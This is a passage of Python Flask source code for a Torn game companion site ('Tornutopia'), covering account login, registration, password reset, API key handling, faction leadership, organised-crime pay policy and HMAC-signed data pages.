                u = 'bad username (must be all numeric)'
            return render_template('bad_login.html', title='bad login attempt', u=u)
        try:
            lastt = wantuser.last_login
            nfail = wantuser.failed_logins
            hash_version = wantuser.pw_ver
        except Exception:
            # BUGFIX: an unreachable render_template() line sat after this
            # return; the dead line has been removed (behavior unchanged).
            return "failed somehow"
        if wantuser.login_allowed and password.checkpw(hash_version, p, wantuser.pwhash):
            reject = False
        if not reject:
            wantuser.last_login = int(time.time())
            wantuser.failed_logins = 0
            login_user(wantuser)
            db.session.commit()
            if lastt:
                lastt = datetime.datetime.fromtimestamp(lastt)
            else:
                lastt = 'never'
            app.logger.info('%s logged in successfully', u)
            for rh in request.headers:
                app.logger.info('%s had request header %s', u, rh)
            return render_template('good_login.html', title='successful login', u=u, nfail=nfail, lastt=lastt, must_change_pw=wantuser.must_change_pw)
        wantuser.failed_logins += 1
        db.session.commit()
        return render_template('bad_login.html', title='bad login attempt', u=u)
    # show form before submission
    return render_template('login.html', title='Sign In', form=form)
#=================================================================================
# This is for testing flask without the web server.
@app.route("/rhubarb/<anything_here>", methods=['GET'])
def no_rhubarb(anything_here):
    """Strip the /rhubarb prefix (used when testing Flask without the web server)."""
    target = '/' + anything_here
    return redirect(target)
#=================================================================================
@app.route('/register', methods = ['GET','POST'])
def register():
    """Create an unconfirmed account and issue an in-game confirmation challenge.

    Rejects non-numeric usernames, duplicate accounts, weak passwords and
    missing cookie consent.  On success another job confirms the account
    once the NEWUSER challenge string is echoed in-game.
    """
    form = RegisterForm()
    u = 'default-u'
    p = 'default-p'
    c = 'default-c'
    if form.validate_on_submit():
        try:
            u = request.form['username']
            p = request.form['password']
            c = request.form['checkbox']
        except Exception:
            return render_template('register.html', title='Register', form=form, retry=True)
        # is username numeric?
        if not re.numeric.match(u):
            return render_template('accounts_explained.html', title='Accounts Explained')
        # does user already exist?
        wantuser = LUser.query.filter_by(username = u).first()
        if wantuser:
            return render_template('message.html', message='That username is already in use. If already registered and confirmed use login. Or wait for a past registration attempt to expire and retry.', logged_in=False)
        # is pw acceptable?
        if not test_strength(p):
            return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=False)
        # is cookie consent on?
        if c != 'yes':
            return render_template('message.html', title='Message', message='Consent to a cookie (for a logged-in session) is required.', logged_in=False)
        pw_ver, pwhash = password.pwhash(0, p)
        et = int(time.time())
        newu = LUser (username=str(u), login_allowed=0, must_change_pw=0, pw_ver=pw_ver, pwhash=pwhash, registered=et, confirmed=0, last_login=0, failed_logins=0)
        db.session.add(newu)
        db.session.commit()
        # set challenge to be done before confirmed is set
        new_random_challenge = challenge.Challenge()
        expected = 'NEWUSER:' + new_random_challenge.get_rfc1760_challenge()
        newc = Challenge(et=et, expires=et+900, used=0, username=u, action='newuser', data='', chal_type='message', expect=expected, pw_ver=pw_ver)
        db.session.add(newc)
        db.session.commit()
        return render_template('challenge.html', title='In-game challenge', challenge=expected)
    # BUGFIX: was `retrry=False` (typo); the template variable is `retry`,
    # matching the `retry=True` case above.
    return render_template('register.html', title='Register', form=form, retry=False)
#=================================================================================
# This is not the same as the "settings" password change (which requires the
# old password); this path issues an in-game PWRESET challenge instead.
@app.route("/rhubarb/unknown_pw_reset", methods=['GET','POST'])
@app.route("/unknown_pw_reset", methods=['GET','POST'])
def unknown_pw_reset():
    """Start a password reset for a user who cannot log in.

    The candidate new password is strength-checked, immediately added to the
    banned list (so it cannot be reused later regardless of outcome), and a
    PWRESET challenge is stored; another job applies the new hash to the
    l_user table once the challenge is answered in-game.
    """
    form = LoginForm() # requests username and password
    # - - - - - - - POST section
    if request.method == 'POST':
        u = None
        p = None
        if form.validate_on_submit():
            try:
                u = request.form['username']
                p = request.form['password']
                # another job either uses or discards the data provided here
            except:
                app.logger.info('error reading from login form for pw reset')
                return redirect('/rhubarb/unknown_pw_reset')
        else:
            app.logger.info('change_pw form fails validation')
            return redirect('/rhubarb/unknown_pw_reset')
        if not test_strength(p):
            return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=False)
        # Ban the candidate password up front (single-use even on failure).
        ban_digest = hashlib.sha1(bytes(p, 'utf-8')).hexdigest()
        ban = Banned_pw(sha = ban_digest)
        db.session.add(ban)
        db.session.commit()
        # rate limit - not too many of these allowed at once
        rate_discovery = Challenge.query.filter_by(username = u).all()
        if len(rate_discovery) > 10:
            return render_template('message.html', message='Too many reset attempts - need to wait.', logged_in=False)
        # set challenge to be done before applied to l_user table
        new_random_challenge = challenge.Challenge()
        expected = 'PWRESET:' + new_random_challenge.get_rfc1760_challenge()
        et = int(time.time())
        pw_ver, pwhash = password.pwhash(0, p)
        newc = Challenge(et=et, expires=et+900, used=0, username=u, action='pwreset', data=pwhash, pw_ver=pw_ver, chal_type='message', expect=expected)
        db.session.add(newc)
        db.session.commit()
        return render_template('challenge.html', title='In-game challenge', challenge=expected)
    # - - - - - - - POST section
    return render_template('pw_reset.html', form=form)
#=================================================================================
@app.route("/settings", methods=['GET'])
@login_required
def settings():
    """Account settings page: API-key status, OC-calc self-report, player info.

    ak_stats layout (from rodb.has_api_key): [et_pstats, et_set, short_err,
    long_err] — NOTE(review): inferred from the comment below; confirm
    against read_sqlite.
    """
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    u = current_user.username
    rodb = read_sqlite.Rodb()
    player = rodb.get_player_data(current_user.username)
    name = player['name']
    # check whether API key has worked recently for player
    # XXX and faction
    # et_pstats, et_set, short_err, long_err
    got_key = [0,0]
    # BUGFIX: not_obsolete was only assigned inside the `if ak_stats[0]:`
    # branch, so the final render_template raised NameError when no API key
    # was known; initialise it unconditionally here.
    not_obsolete = 1 # assume sqlite is current then check whether there is a more recent psql
    ak_stats = list(rodb.has_api_key(u)) # simple numeric values
    if ak_stats[0]:
        got_key[0] = 1
        # compare to ORM
        wantevent = Apikey_history.query.filter_by(username = u).first()
        if wantevent:
            if wantevent.et_web_update > ak_stats[1]:
                not_obsolete = 0 # psql more recent
            if wantevent.deleted:
                got_key[0] = 0
        # massage for human readability
        if ak_stats[0] and ak_stats[3]:
            if ak_stats[3] < ak_stats[0]:
                # error has been fixed
                ak_stats[3] = 0
            else:
                # problem been seen
                got_key[1] = 1
            if ak_stats[2] < ak_stats[0]:
                # error has been fixed
                ak_stats[2] = 0
            else:
                # problem been seen
                got_key[1] = 1
        ak_stats[0] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ak_stats[0]))
        ak_stats[1] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ak_stats[1]))
    oc_calc_sr = 0
    want_oc = Report_number_oc.query.filter_by(pid = u).all()
    for i in want_oc:
        if player['oc_calc'] != i.number_oc:
            oc_calc_sr = i.number_oc # self-reported number
    return render_template('settings.html', title='Tornutopia Settings', u=u, name=name, player=player, oc_calc_sr=oc_calc_sr, got_key=got_key, ak_stats=ak_stats, not_obsolete=not_obsolete)
#=================================================================================
@app.route("/change_pw", methods=['GET','POST'])
@login_required
def change_pw():
    """Change the logged-in user's password (old password required).

    Deliberately does NOT redirect on must_change_pw — this is the page
    forced-change users are sent to.  The new password is strength-checked
    and its SHA-1 digest added to the banned list after use.
    """
    u = current_user.username
    rodb = read_sqlite.Rodb()
    player = rodb.get_player_data(current_user.username)
    name = player['name']
    form = PasswordForm()
    # - - - - - - - POST section
    if request.method == 'POST':
        old_pw = None
        new_pw = None
        if form.validate_on_submit():
            try:
                old_pw = request.form['old_password']
                new_pw = request.form['new_password']
            except:
                app.logger.info('error reading from change_pw form')
                return redirect('/rhubarb/change_pw')
        else:
            app.logger.info('change_pw form fails validation')
            return redirect('/rhubarb/change_pw')
        # is old pw correct?
        wantuser = LUser.query.filter_by(username = u).first()
        if not wantuser:
            # should never happen - has this user been deleted while logged in?
            return redirect('/rhubarb/logout')
        if not password.checkpw(wantuser.pw_ver, old_pw, wantuser.pwhash):
            return render_template('message.html', message='old password incorrect', logged_in=True)
        # is new pw acceptable?
        if not test_strength(new_pw):
            return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=True)
        # set new pwhash for u and show success
        v,h = password.pwhash(0, new_pw)
        if not v or not h:
            return render_template('message.html', message='failure to handle new password', logged_in=True)
        # set new password and add to banned list
        wantuser.pw_ver = v
        wantuser.pwhash = h
        wantuser.must_change_pw = 0
        db.session.commit()
        ban_digest = hashlib.sha1(bytes(new_pw, 'utf-8')).hexdigest()
        ban = Banned_pw(sha = ban_digest)
        db.session.add(ban)
        db.session.commit()
        return render_template('message.html', message='password changed', logged_in=True)
    # - - - - - - - POST section
    return render_template('set_pw.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/set_oc_calc", methods=['GET','POST'])
@login_required
def set_oc_calc():
    """Let the user self-report their OC-calculation number (stored in
    Report_number_oc and shown back on /settings)."""
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    u = current_user.username
    rodb = read_sqlite.Rodb()
    player = rodb.get_player_data(current_user.username)
    name = player['name']
    number_oc = 0
    form = OccalcForm()
    if request.method == 'POST':
        if form.validate_on_submit():
            try:
                number_oc = request.form['number_oc']
            except:
                return render_template('message.html', message='Something failed about reading from occalcform.', logged_in=True)
        else:
            app.logger.info('set_oc_calc form fails validation')
            return render_template('message.html', message='Form fails validation.', logged_in=True)
        # Only positive values are recorded; id is a random surrogate key.
        if int(number_oc) > 0:
            new_id=int(random.random() * 1000000000)
            report_number_oc = Report_number_oc(id=new_id, timestamp=int(time.time()), pid=int(u), number_oc=number_oc)
            db.session.add(report_number_oc)
            db.session.commit()
        return redirect('/rhubarb/settings')
    return render_template('set_oc_calc.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/delete_api_key", methods=['GET','POST'])
@login_required
def delete_api_key():
    """Queue a spool-file command asking the collector to drop this user's API key."""
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    uid = str(current_user.username)
    # Randomly-named spool file picked up by another job.
    spool_path = '/var/torn/spool/collect/' + str(int(random.random() * 1000000000))
    with open(spool_path, 'w') as spool:
        print("DELETE APIKEY\n" + uid + "\nEND", file=spool)
    # Record the deletion so /settings shows key state ahead of the sqlite refresh.
    event = Apikey_history(username=uid, et_web_update=int(time.time()), deleted=1)
    db.session.add(event)
    db.session.commit()
    return render_template('message.html', message='accepted command to delete API key', logged_in=True)
#=================================================================================
@app.route("/set_api_key", methods=['GET','POST'])
@login_required
def set_api_key():
    """Accept a Torn API key and queue it as a spool-file command for the
    collector; records the event in Apikey_history."""
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    u = current_user.username
    rodb = read_sqlite.Rodb()
    player = rodb.get_player_data(current_user.username)
    name = player['name']
    form = ApikeyForm()
    # - - - - - - - POST section
    if request.method == 'POST':
        if form.validate_on_submit():
            try:
                apikey = request.form['apikey']
                use_for_faction = request.form['use_for_faction']
            except:
                return render_template('message.html', message='something failed about reading', logged_in=True)
        else:
            app.logger.info('error reading from ApikeyForm')
            return render_template('message.html', message='ApikeyForm fails validation.', logged_in=True)
        # Randomly-named spool file picked up by another job.
        new_fname = '/var/torn/spool/collect/' + str(int(random.random() * 1000000000))
        with open(new_fname, 'w') as api_out:
            print("APIKEY\n" + apikey + '\n' + str(use_for_faction) + "\nEND", file=api_out)
        event = Apikey_history(username=str(current_user.username), et_web_update=int(time.time()), deleted=0)
        db.session.add(event)
        db.session.commit()
        return redirect('/rhubarb/settings')
    # - - - - - - - POST section
    return render_template('set_api_key.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/delete_account", methods=['GET','POST'])
@login_required
def delete_account():
    """Delete the logged-in user's LUser row after re-confirming the password."""
    u = current_user.username
    rodb = read_sqlite.Rodb()
    player = rodb.get_player_data(current_user.username)
    name = player['name']
    form = DeleteForm()
    # - - - - - - - POST section
    if request.method == 'POST':
        if form.validate_on_submit():
            try:
                pw = request.form['password']
            except:
                return render_template('message.html', title='Delete Failed', message='something failed about reading from deleteform', logged_in=False)
        else:
            app.logger.info('delete_account form fails validation')
            return redirect('/rhubarb/settings')
        wantuser = LUser.query.filter_by(username = u).first()
        if not wantuser:
            return render_template('message.html', title='Delete Failed', message='user to be deleted cannot be found', logged_in=False)
        # check password
        if not password.checkpw(wantuser.pw_ver, pw, wantuser.pwhash):
            return render_template('message.html', title='Delete Failed', message='wrong password', logged_in=True)
        db.session.delete(wantuser)
        db.session.commit()
        return redirect('/rhubarb/logout')
    # - - - - - - - POST section
    return render_template('delete_account.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route('/faction_ov')
@login_required
def faction_ov():
    """Faction overview: summary, recent big losses, friendly fire, leaders."""
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    big_losses = rodb.recent_big_losses(faction_sum['fid'])
    player = rodb.get_player_data(current_user.username)
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    friendly_fires = rodb.get_friendly_fire(faction_sum['fid'])
    # extra leaders from ORM
    extra = obtain_leaders_for_faction(current_user.username, faction_sum['fid'])
    return render_template('faction_ov.html', title='Faction Overview', u=current_user.username, player=player, faction_sum=faction_sum,
        is_leader=is_leader, friendly_fires=friendly_fires, extra=extra, nrbl=len(big_losses), big_losses=big_losses)
#=================================================================================
@app.route('/leaders', methods=['GET','POST'])
@login_required
def leaders():
    """Promote/demote faction leaders.

    GET shows the form to everyone; POST is applied only for leaders
    (non-leaders are logged out).  Changes are appended to Extra_leaders —
    the latest row per player wins (see obtain_leaders_for_faction).
    """
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    extra = obtain_leaders_for_faction(current_user.username, faction_sum['fid'])
    form = LeaderForm()
    # Demote choices: current leaders only.
    form.player_demote.choices = [(0, 'no selection')]
    for eleader in extra:
        form.player_demote.choices.append((eleader, extra[eleader][2]))
    # Promote choices: members who are not leaders already.
    form.player_promote.choices = [(0, 'no selection')]
    for pid in sorted(faction_sum['members']):
        # members of this faction, and only if they are not leaders already
        if not bool_leader(int(pid), faction_sum['fid']):
            form.player_promote.choices.append((pid, rodb.pid2n[pid]))
    # - - - - - - - POST section
    if request.method == 'POST':
        if not is_leader:
            return redirect('/rhubarb/logout')
        player_demote = None
        player_promote = None
        #
        if form.is_submitted():
            try:
                player_demote = request.form['player_demote']
            except:
                pass
            try:
                player_promote = request.form['player_promote']
            except:
                pass
        else:
            return render_template('message.html', title='Change leaders', message='validation of LeaderForm failed', logged_in=True)
        # player_demote and player_promote are str and '0' is a valid value meaning no selection.
        if not player_demote or not player_promote:
            return render_template('message.html', title='Change leaders', message='valid input not detected', logged_in=True)
        now = int(time.time())
        if player_demote != '0':
            dl = Extra_leaders(et=now, faction_id=int(faction_sum['fid']), player_id=int(player_demote), is_leader=0, set_by=int(current_user.username))
            db.session.add(dl)
        if player_promote != '0':
            pl = Extra_leaders(et=now, faction_id=int(faction_sum['fid']), player_id=int(player_promote), is_leader=1, set_by=int(current_user.username))
            db.session.add(pl)
        db.session.commit()
        return redirect('/rhubarb/faction_ov')
    # - - - - - - - POST section
    return render_template('leaders.html', title='Leader Appointment', faction_sum=faction_sum, is_leader=is_leader, form=form)
#=================================================================================
@app.route('/pay_policy', methods=['GET','POST'])
@login_required
def pay_policy():
    """View and (for leaders) change the faction's OC payout policy.

    POSTed changes are cached in the Ocpolicy ORM; the page flags `pending`
    while the cached change differs from what the sqlite side reports.
    """
    rodb = read_sqlite.Rodb()
    oc_num2title = rodb.get_oc_titles()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    form = OCpolicyForm()
    form.cn.choices = [(k, oc_num2title[k]) for k in sorted(oc_num2title.keys())]
    # - - - - - - - POST section
    if request.method == 'POST':
        if not is_leader:
            return redirect('/rhubarb/logout')
        if form.validate_on_submit():
            try:
                cn = request.form['cn']
                percent = request.form['percent']
            except:
                app.logger.info('error involving OCpolicyForm')
                return render_template('message.html', title='change to pay policy', message='OCpolicyForm exception reading input', logged_in=True)
        else:
            app.logger.info('OCpolicyForm fails validation')
            return render_template('message.html', title='change to pay policy', message='OCpolicyForm failed validation', logged_in=True)
        try:
            policy_update = Ocpolicy(faction=int(faction_sum['fid']), timestamp=int(time.time()), percent=percent, username=current_user.username, octype=cn)
            db.session.add(policy_update)
            db.session.commit()
        except:
            app.logger.info('error inserting ino Ocpolicy ORM')
            return render_template('message.html', title='change to pay policy', message='Change of pay policy failed to update DB.', logged_in=True)
        return redirect('/rhubarb/pay_policy')
    # - - - - - - - POST section
    # read policy from sqlite
    read_policy = rodb.get_oc_payment_policy(faction_sum['fid'])
    policy = {} # mutable to produce human-readable times
    for k in sorted(read_policy.keys()):
        et = read_policy[k][0]
        policy[k] = list(read_policy[k])
        policy[k][0] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(et))
        if str(read_policy[k][3]) in rodb.pid2n:
            policy[k][3] = rodb.pid2n[ str(read_policy[k][3]) ]
    # check the orm for a cached alteration to the figures from sqlite
    pending = 0
    want_policy_change = Ocpolicy.query.filter_by(faction = faction_sum['fid']).all()
    for pol_item in want_policy_change:
        if pol_item.octype not in policy:
            pending=1
            break
        if float(pol_item.percent) != float(policy[pol_item.octype][2]):
            pending=1
            break
    return render_template('pay_policy.html', title='Pay Policy', u=current_user.username, is_leader=is_leader, policy=policy, oc_num2title=oc_num2title, pending=pending, form=form)
#=================================================================================
@app.route('/faction_player_table')
@login_required
def faction_player_table():
    """Leader-only page listing every player in the viewer's faction."""
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    uid = current_user.username
    reader = read_sqlite.Rodb()
    faction_sum = reader.get_faction_for_player(uid)
    player = reader.get_player_data(uid)
    is_leader = bool_leader(int(uid), faction_sum['fid'])
    if not is_leader:
        # Non-leaders get a refusal page instead of the table.
        return render_template('message.html', title='Faction Player Table Denied', u=uid, player=player, message='No access to player table!', logged_in=True)
    # Reuse the faction summary already fetched rather than looking it up again.
    pt = reader.get_player_table(faction_sum)
    return render_template('faction_player_table.html', title='Faction Player Table', u=uid, player=player, faction_sum=faction_sum, is_leader=is_leader, pt=pt)
#=================================================================================
@app.route('/home')
@login_required
def home():
    """Player home page.

    Shows the player's faction summary, the most recent leadership record
    from the Extra_leaders ORM table and, for leaders only, any organised
    crime payments currently due.
    """
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    player = rodb.get_player_data(current_user.username)
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    # what do we know about this player being a leader?
    maybe_leader = Extra_leaders.query.filter_by(faction_id = int(faction_sum['fid'])).filter_by(player_id = int(current_user.username)).all()
    # keep only the most recent record (highest epoch time)
    leader_entry = False
    et = 0
    set_by = None
    any_data = False
    for ml in maybe_leader:
        if ml.et > et:
            any_data = True
            et = ml.et
            set_by = ml.set_by
            leader_entry = bool(ml.is_leader)
    if any_data:
        leader_record = [any_data, leader_entry, time.strftime("%Y-%m-%d %H:%M",time.gmtime(et)), rodb.pid2n[str(set_by)]]
    else:
        leader_record = [any_data, False, 'never', '']
    payment_due = []
    if is_leader:
        payment_due = rodb.oc_payment_check(faction_sum['fid'])
    return render_template('home.html', title='home', u=current_user.username,
                           player=player, faction_sum=faction_sum, is_leader=is_leader,
                           leader_record=leader_record, payment_due=payment_due)
#=================================================================================
@app.route("/rhubarb/graph/<what_graph>", methods=['GET'])
@app.route("/graph/<what_graph>", methods=['GET'])
def jsgraph(what_graph):
    """Serve a JS graph page (crime or drug history) for one player.

    what_graph encodes "<player_id><graph_type><timestamp><hmac>" (parsed by
    the module-level `token` regex).  The HMAC gates access without a login;
    links expire 24 hours after generation.
    """
    right_now = int(time.time())
    # what graph is this meant to produce?
    re_object = token.match(what_graph)
    if not re_object:
        app.logger.info('in jsgraph RE did not match URL')
        return render_template("bad_graph_request.html")
    p_id = re_object.group(1)
    graph_type = re_object.group(2)
    timestamp = re_object.group(3)
    given_hmac = re_object.group(4)
    # one entry per supported graph type: (sql query, template) — replaces
    # three separate if/elif chains that repeated the same dispatch
    graph_dispatch = {
        'crime': ("select et,selling_illegal_products,theft,auto_theft,drug_deals,computer_crimes,murder,fraud_crimes,other,total from playercrimes where player_id=? order by et", "playercrimes.html"),
        'drug': ("select et,cantaken,exttaken,lsdtaken,opitaken,shrtaken,pcptaken,xantaken,victaken,spetaken,kettaken from drugs where player_id=? order by et", "drug.html"),
    }
    if graph_type not in graph_dispatch:
        return render_template("bad_graph_request.html")
    # calc correct hmac over the same fields the link generator signed
    graph_selection = ( str(p_id) + graph_type + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, graph_selection, digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac (constant-time comparison)
    if not hmac.compare_digest(hmac_hex, given_hmac):
        app.logger.info('in jsgraph HMAC disagreement')
        return render_template("bad_graph_request.html")
    # test for acceptable timestamp: links expire after 24 hours
    if ((int(timestamp) + 86400) < right_now):
        app.logger.info('in jsgraph timestamp is old')
        return render_template("bad_graph_request.html")
    sql, template = graph_dispatch[graph_type]
    conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
    try:
        df = pd.read_sql_query(sql, conn, params=(int(p_id),))
    finally:
        # close even if the query raises (the original leaked the connection)
        conn.close()
    # Does df contain reasonable data? TODO
    # convert et to date-as-string so it can be parsed in JS
    df['et'] = pd.to_datetime(df['et'],unit='s').astype(str)
    chart_data = df.to_dict(orient='records')
    return render_template(template, data={'chart_data': chart_data})
#=================================================================================
@app.route("/rhubarb/faction_oc_history/<tid_cn_t>", methods=['GET','POST'])
@app.route("/faction_oc_history/<tid_cn_t>", methods=['GET','POST'])
@login_required
def faction_oc_history(tid_cn_t):
    """Completed organised-crime history for a faction (or one player).

    tid_cn_t is "<tid>-<cn>-<timestamp>[-history]-<hmac>": tid is a faction
    id (or a player id when cn is 0), cn the crime number, and the optional
    'history' flag selects the long (up to a year) search.  POST records a
    payment for one OC plan in the Payment_cache ORM table.
    """
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    # fid, cn, history-or-et
    percent_to_pay = 0
    cu = current_user.username
    logged_in = True
    tid = None
    cn = None
    timestamp = None
    history_column = None
    hmac_given = None
    re_object = oc_history_picker.match(tid_cn_t)
    if re_object:
        tid = re_object.group(1)
        cn = re_object.group(2)
        timestamp = re_object.group(3)
        history_column = re_object.group(4)
        hmac_given = re_object.group(5)
    else:
        return render_template('message.html', message='failed to discover the history intended by this click', logged_in=logged_in)
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    player = rodb.get_player_data(current_user.username)
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    # check time and hmac
    right_now = int(time.time())
    if ((int(timestamp) + 86400) < right_now):
        return render_template('message.html', message='link expired; cannot use it', logged_in=logged_in)
    # either show all the data (up to the last year) or just a recent extract
    long_search = False
    if history_column == 'history':
        long_search = True
        flask_parm = (str(tid) + '-' + str(cn) + '-' + str(timestamp) + '-history' ).encode("utf-8")
    else:
        flask_parm = (str(tid) + '-' + str(cn) + '-' + str(timestamp)).encode("utf-8")
    # read the payment policy of this faction (e.g. pay 20% of PA winnings to each player)
    oc_percentages = rodb.get_oc_payment_policy(tid)
    if int(cn) in oc_percentages:
        percent_to_pay = oc_percentages[int(cn)][2]
    hmac_hex_hist = hmac.new(hmac_key, flask_parm, digestmod=hashlib.sha1).hexdigest()
    # constant-time comparison — matches every other HMAC check in this file
    # (was a plain ==, which leaks timing information)
    if not hmac.compare_digest(hmac_hex_hist, hmac_given):
        return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
    form = PaymentForm()
    # - - - - - - - POST section
    if request.method == 'POST':
        if not is_leader:
            return redirect('/rhubarb/logout')
        if form.validate_on_submit():
            try:
                # form_faction is read as a presence check only; the tid from
                # the (HMAC-verified) URL is what actually gets stored below
                form_faction = request.form['faction_id']
                ocp = request.form['oc_plan_id']
            except:
                app.logger.info('error involving paymentform')
                return redirect('/rhubarb/faction_ov')
        else:
            app.logger.info('paymentform fails validation')
            return redirect('/rhubarb/faction_ov')
        # write to ORM payment for (form_faction,ocp) by current user at now
        # NOTE(review): random id allows (rare) collisions — a DB sequence would be safer
        new_pay_id=int(random.random() * 1000000000)
        pay = Payment_cache(id=new_pay_id, faction_id=int(tid), oc_plan_id=int(ocp), timestamp=int(time.time()), paid_by=int(cu))
        db.session.add(pay)
        db.session.commit()
        return redirect('/rhubarb/faction_oc_history/' + tid_cn_t)
    # - - - - - - - POST section
    player = {'name':'no name'}
    if int(cn):
        try:
            faction_sum = rodb.get_faction_for_player(current_user.username)
            if not faction_sum['fid'] == int(tid):
                # viewing from outside faction
                return render_template('message.html', message='organised crime data - need to be logged in and in the faction to see that', logged_in=logged_in)
        except:
            # viewing from outside faction
            return render_template('message.html', message='organised crime data - need to be logged in and in the faction to see that', logged_in=logged_in)
    else:
        # This is a player request and not a faction request - indicated by crime number 0.
        # no need to authenticate the user but we do want the name
        player = rodb.get_player_data(tid)
    # This is the file with Payment_cache defined. Read ORM here and pass details to rodb.get_oc()
    payment_query = db.session.query(Payment_cache).filter(Payment_cache.faction_id == tid)
    want_payment = payment_query.all()
    cached_payments = {}
    for cached in want_payment:
        cached_payments[cached.oc_plan_id] = {'paid_at':cached.timestamp, 'paid_by':cached.paid_by}
    try:
        octable, future = rodb.get_oc(tid, cn, long_search, cached_payments) # "tid" might be fid or pid
    except:
        # example data shown when the real fetch fails (deliberate best-effort)
        octable = [[ 'Today', 8, 'failed to fetch octable', {'4':'Duke', '317178':'Flex'} , {'money':100, 'respect':5, 'delay':1800}, {'paid_by':0, 'paid_at':0}, 1234 ],
                   [ 'Yesterday', 8, 'failed to fetch octable', {'1455847':'Para'} , {'result':'FAIL', 'delay':60}, {'paid_by':0, 'paid_at':0}, 2345 ]]
    return render_template("completed_oc.html", form=form, cn=int(cn), player_name=player['name'], cu=cu, octable=octable, make_links=True if int(tid) >0 else False, percent_to_pay=percent_to_pay)
#=================================================================================
@app.route("/armory_index", methods=['GET'])
@login_required
def armory_index():
    """Leader-only index of armory consumption totals per player.

    Sums every factionconsumption row per player, then builds for each
    player an HMAC-signed link to the detailed /armorynews page.
    """
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    player = rodb.get_player_data(current_user.username)
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    if not is_leader:
        return render_template('message.html', title='Denied', u=current_user.username, player=player, message='No access to armorynews!', logged_in=True)
    f_id = faction_sum['fid']
    players = {}
    # consumption columns, in the same order as the select list below
    fields = ('neumune', 'empty_blood', 'morphine', 'full_blood', 'first_aid',
              'small_first_aid', 'bottle_beer', 'xanax', 'energy_refill')
    conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
    c = conn.cursor()
    c.execute("select player_id,neumune,empty_blood,morphine,full_blood,first_aid,small_first_aid,bottle_beer,xanax,energy_refill from factionconsumption where faction_id=?", (f_id,))
    for row in c:
        p = row[0]
        # setdefault seeds a zeroed record on first sight of the player,
        # replacing the duplicated first-row/subsequent-row branches
        totals = players.setdefault(p, dict.fromkeys(fields, 0))
        for field, amount in zip(fields, row[1:]):
            totals[field] += amount
    c.close()
    conn.close()
    right_now = int(time.time())
    for p in players.keys():
        players[p]['name'] = rodb.pid2namepid(p)
        display_selection = (str(p) + '-' + str(right_now) ).encode("utf-8")
        players[p]['url'] = '/rhubarb/armorynews/' + str(p) + '-' + str(right_now) + '-' + hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
    return render_template("faction_stuff_used.html", players=players)
#=================================================================================
@app.route("/rhubarb/armorynews/<player_t>", methods=['GET'])
@app.route("/armorynews/<player_t>", methods=['GET'])
@login_required
def armorynews(player_t):
    """Show one player's armory consumption log.

    player_t is "<player_id>-<timestamp>-<hmac>" as generated by
    armory_index(); the HMAC stops URL tampering and links expire
    after 24 hours.
    """
    p_id = None
    timestamp = None
    given_hmac = None
    right_now = int(time.time())
    re_object = armory_token.match(player_t)
    if re_object:
        p_id = re_object.group(1)
        timestamp = re_object.group(2)
        given_hmac = re_object.group(3)
    else:
        app.logger.info('in armorynews RE did not match URL')
        return render_template("bad_graph_request.html")
    # calc correct hmac over the same fields armory_index signed
    display_selection = (str(p_id) + '-' + str(timestamp) ).encode("utf-8")
    hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
    # test for correct hmac (constant-time comparison)
    if not hmac.compare_digest(hmac_hex, given_hmac):
        return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
    # test for acceptable timestamp: links are honoured for 24 hours only
    if ((int(timestamp) + 86400) < right_now):
        return render_template('message.html', message='too old; link has expired', logged_in=True)
    # need to know faction of the player viewing this page
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = faction_sum['fid']
    player = rodb.get_player_data(p_id)
    stuff_used = []
    parm = (int(p_id), int(f_id),)
    conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
    c = conn.cursor()
    c.execute("select et,words from factionconsumption where player_id=? and faction_id=? order by et desc", parm)
    for row in c:
        # epoch seconds -> human-readable UTC time
        printable_time = time.strftime("%Y-%m-%d %H:%M",time.gmtime(row[0]))
        stuff_used.append([printable_time, row[1]])
    c.close()
    conn.close()
